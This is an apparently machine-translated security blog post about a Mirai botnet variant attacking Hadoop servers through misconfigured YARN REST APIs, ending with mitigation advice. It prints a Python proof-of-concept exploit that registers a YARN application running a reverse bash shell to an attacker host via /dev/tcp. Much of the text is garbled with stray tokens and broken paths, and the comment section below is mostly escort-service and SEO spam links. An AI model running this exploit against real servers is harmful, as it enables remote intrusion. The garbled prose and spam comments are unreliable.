In addition to IoT: the Mirai botnet started attacking the machines on Linux
The Mirai botnet appeared in 2016 and in a short time managed infect more than 600 thousand IoT devices. Last week became known. about the new version of Mirai, which aims - Linux-servers with Hadoop. We understand what vulnerability the virus uses and how to “cover it up”.
3r3144. 3r3173. /Flickr / D J Shin / CC BY-SA [/i] 3r3151.
A few words about Mirai
Mirai has become known for a series of high-profile attacks. One was on the blog of journalist Brian Krebs (Brian Krebs) after the publication of an article about the sales of botnet services. The other is on 3r333. major DNS provider Dyn
, which caused the failure of world services: Twitter, Reddit, PayPal, GitHub and many others.
To “capture” IoT devices, the botnet used a vulnerability associated with weak passwords (manufacturers made them the same for all smart devices). The malware monitored the Internet for open telnet ports and brute-in the known login-password pairs for accessing the device owner’s account. If successful, the gadget became part of the “malicious network”.
At the end of 201? the developers posted source codes virus into the network. This led to the emergence of several more versions of malicious software, but they all made the goal of the Internet of Things their goal. Until recently, the Mirai worm now appeared, which attacks Linux servers in data centers.
The botnet “recruits” Linux
3r3355. Report
a new version of Mirai published information security specialists company NETSCOUT. It is known that a botnet attacks servers with the Apache Hadoop framework installed. As the information security specialists say, hackers are attracted by the power of iron. Hadoop is used on servers running high-performance computing and working with machine learning algorithms. The network of productive devices will allow to make more destructive DDoS-attacks.
The Mirai version for Linux still hacks the system by selecting factory telnet credentials. But now the program does not need to distinguish between different types of IoT gadget architectures; Mirai only attacks servers with x86 processors.
3r3633. At the same time, a new botnet does not install malware on a hacked device on its own. The worm sends the attacker's IP-address of the vulnerable machine and a pair of login-password for it. Then hackers install DDoS bots manually.
What vulnerability is used
The malware uses the YARN module for server penetration, which is responsible for managing cluster resources and scheduling tasks in Apache Hadoop.
With the wrong configuration YARN attacking 3r3-33160. can get
access to the internal REST API of the system through ports 8088 and 8090. When connecting remotely, an attacker can add a new application to the cluster. By the way, about this The problem is known for several years now - at 3r3r77. ExploitDB
and GitHub published PoC-exploits.
For example, on GitHub The following code is presented, 3r33211. exploit:
3r3391. 3r33939. #! /usr /bin /env python
import requests
target = 'http://???.1:8088/'
lhost = '???.1' # 3 3r322.
url = target + 'ws /v1 /cluster /apps /new-application'
resp = requests.post (url)
app_id = resp.json ()['application-id']
url = target + 'ws /v1 /cluster /apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin /bash -i> & /dev /tcp /% s /9999 0> & 1'% lhost,
},
},
'application-type': 'YARN',
}
requests.post (url, json = data)
3r3115. 3r3116.
In addition to Mirai, this vulnerability is used by another DDoS bot, DemonBot, which was discovered in October by Radware specialists. Since the beginning of autumn, they have recorded more than a million hacking attempts through the YARN vulnerability daily.
What the experts say 3r3124.
According to the information security specialists, the most hacking attempts were made in the USA, the UK, Italy, and Germany. At the beginning of the month, just over a thousand servers worldwide were exposed to vulnerabilities in YARN. This is not so much, but they all have high computing power.
There is also information that a vulnerability in Hadoop could provide attackers with access to data stored on unprotected servers. So far, no such cases have been reported, but experts 3r3131. warn that it is only a matter of time.
The new version of Mirai does not spread quickly - only a few tens of thousands of attempts to crack Hadoop machines via YARN occur every day. And all the attacks come from a small number of IP addresses - no more than forty.
3r3141.
3r3144. 3r3173. /Flickr /3r3146. Jelene Morris
/3r3148. CC BY
[/i] 3r3151.
Such behavior of intruders and prompted NETSCOUT experts to the idea that the virus does not spread automatically - hackers manually scan the Internet and implement the program on unprotected machines. This means that server owners with Hadoop installed have more time to close the vulnerability.
To protect against attack need to change settings network security. It is enough for administrators to restrict access to the computing cluster — configure IP filters or completely close the network from external users and applications.
To prevent unauthorized access to the system, security specialists also advise upgrading Hadoop to version 2.x and enabling authentication via the Kerberos protocol.
3r33170.
3r3173. Several posts from the blog VAS Experts: 3r33232.
3r3202.
3r3181. Botnet “spamming” through routers - what you need to know
3r3186. Implementing IPv6 - FAQ for ISP
3r3191. DDOS and 5G: thicker "pipe" - more problems 3r-3211.
Couple of fresh materials from our blog on Habré:
3r3202.
How will Starlink launch - satellite Internet from Ilona Mask
To replace TCP: QUIC protocol is ready for[но не готов стать RFC]deployment.
[/i]
It may be interesting
This publication has no comments.
weber
Author30-11-2018, 21:26
Publication DateDevelopment / Information Security
Category- Comments: 0
- Views: 309
Comments
Born and raised in Sarawak, Malaysia. ICE CREAM is now one of the very few DJs who are active in the International scene. He had trained his way into playing at the top clubs all over Borneo since 2010. Check Out: DJ Ice cream
Thanks for the information your article brings. I see the novelty of your writing, I will share it for everyone to read together. I look forward to reading many articles from you.
<a href="https://sites.google.com/view/escortmumbaishub/"> Mumbai Escorts Service </a>
<a href="https://vipmumbaiescortshub.blogspot.com/"> Escorts Service in Mumbai </a>
<a href="https://vipmumbaiescortshub.wordpress.com/"> Independent Mumbai Escorts Service </a>
<a href="https://vipmumbaiescortshub.weebly.com/"> Independent Mumbai Escorts Girls </a>
<a href="https://mumbaiescortshub.webgarden.com/"> Call Girls Service in Mumbai </a>
It's been operating for a long time in this publish for a great concept on it. I truly very experience analyzing your true and beneficial post thanks and you guys doing the sort of a great job keep it up
Premium Call Girls in Mumbai
Escorts Service in Mumbai
Escorts Agency in Mumbai
Mumbai Call Girl Service
Escorts Agency in Mumbai
This is a good post. This post gives truly quality information. I’m definitely going to look into it. Really very useful tips are provided here. Thank you so much. Keep up the good works.
Late-night Slim Call Girls in Mumbai
Slim Call Girls in Mumbai
New Girl Available in Mumbai Escort
Collage Escort Girl from Mumbai
New Girl Available in Mumbai Escort
<a href="https://sites.google.com/view/escortmumbaishub/"> Mumbai Escorts Service </a>
<a href="https://vipmumbaiescortshub.blogspot.com/"> Escorts Service in Mumbai </a>
<a href="https://vipmumbaiescortshub.wordpress.com/"> Independent Mumbai Escorts Service </a>
<a href="https://vipmumbaiescortshub.weebly.com/"> Independent Mumbai Escorts Girls </a>
<a href="https://mumbaiescortshub.webgarden.com/"> Call Girls Service in Mumbai </a>
It's been operating for a long time in this publish for a great concept on it. I truly very experience analyzing your true and beneficial post thanks and you guys doing the sort of a great job keep it up
Premium Call Girls in Mumbai
Escorts Service in Mumbai
Escorts Agency in Mumbai
Mumbai Call Girl Service
Escorts Agency in Mumbai
This is a good post. This post gives truly quality information. I’m definitely going to look into it. Really very useful tips are provided here. Thank you so much. Keep up the good works.
Late-night Slim Call Girls in Mumbai
Slim Call Girls in Mumbai
New Girl Available in Mumbai Escort
Collage Escort Girl from Mumbai
New Girl Available in Mumbai Escort
If you go to file1.php and use an include, then the path is looked at from file1.php to file2.php to include it. But DIR allows us to give file1.php the correct path to file2.php when file1.php is not the file being executed. The interpreter is looking at being inside the project folder. Then if file1 calls to file2 via include, the interpreter will first look for require('file2.php') inside the project folder, NOT the inc geometry dash folder.
The Daily Reports is the reliable and authentic news and blog publisher. Visit The Daily Reports for up-to-date US news, international news and policy analysis. Check out: International Politics News
At Lopez Dario, we strive to serve customers with our online business consultancy services, project management, bookkeeping, & accounting for small businesses. Check Out: Business Consultancy England
At Lopez Dario, we strive to serve customers with our online business consultancy services, project management, bookkeeping, & accounting for small businesses. Check Out: Business Consultancy England
nice post, keep up with this interesting work. It really is good to know that this topic is being covered also on this web site so cheers for taking time to discuss this! https://l23movies.club/